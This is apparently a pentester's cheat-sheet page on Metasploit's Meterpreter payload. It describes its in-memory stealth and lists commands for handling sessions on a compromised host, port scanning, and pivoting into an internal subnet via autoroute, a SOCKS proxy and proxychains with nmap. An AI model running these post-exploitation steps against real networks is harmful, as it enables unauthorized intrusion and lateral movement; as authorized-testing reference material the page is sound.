Meterpreter

Description

Meterpreter is a Metasploit attack payload that provides an interactive shell from which an attacker can explore the target machine and execute code. Meterpreter is deployed using in-memory DLL injection. As a result, Meterpreter resides entirely in memory and writes nothing to disk. No new processes are created as Meterpreter injects itself into the compromised process, from which it can migrate to other running processes. As a result, the forensic footprint of an attack is very limited.

Usage

List sessionsUpgrade a sessionInteract with a sessionBackground a sessionTCP Port Scan

sessions -l 

sessions -u 1

sessions -i 1

background

CTRL + Z

use auxiliary/scanner/portscan/tcp
set RHOSTS 172.16.0.24
run

Pivot

Create an autorouteStart a socks serverConfigure proxychainsUse proxychains through metasploit

sessions -i 1
ipconfig
run autoroute -s 172.16.0.0/24

use auxiliary/server/socks_proxy
set SRVPORT 9050
set VERSION 4a
run

/etc/proxychains.conf

 [ProxyList]
# add proxy here ...
socks4  127.0.0.1   9050

proxychains -q nmap -sT 172.16.0.24

References

• Meterpreter cheatsheet